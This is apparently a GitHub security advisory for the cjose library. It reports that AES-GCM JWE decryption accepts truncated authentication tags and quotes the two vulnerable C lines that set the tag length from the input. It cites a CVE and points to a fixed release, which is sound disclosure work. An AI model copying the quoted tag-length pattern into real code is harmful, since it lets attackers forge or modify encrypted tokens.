SECURITY VULNERABILITY: incorrect Authentication Tag length usage in AES GCM decryption

[zandbelt]

NOTE THAT AES GCM DECRYPTION IS SEVERELY BROKEN FOR ALL VERSIONS OF CJOSE < 0.6.2.2

The AES GCM decryption routine incorrectly uses the Tag length from the actual Authentication Tag provided in the JWE, see: https://github.com/cisco/cjose/blob/0.6.1/src/jwe.c#L1228-L1229:

  // set the expected GCM-mode authentication tag
  if (EVP_CIPHER_CTX_ctrl(ctx, CJOSE_EVP_CTRL_GCM_SET_TAG, jwe->enc_auth_tag.raw_len, jwe->enc_auth_tag.raw) != 1)

However, the spec https://datatracker.ietf.org/doc/html/rfc7518#section-4.7 says that a fixed length of 16 octets must be applied:

The requested size of the Authentication Tag output MUST be 128 bits, regardless of the key size.

Therefore this bug allows an attacker to provide a truncated Authentication Tag and to modify the JWE accordingly.

See also: CVE-2023-37464 and https://github.com/OpenIDC/cjose/security/advisories/GHSA-3rhg-3gf2-6xgj

[zandbelt]

A fix for this vulnerability is available in the 0.6.2.x maintenance release fork here: https://github.com/OpenIDC/cjose/releases/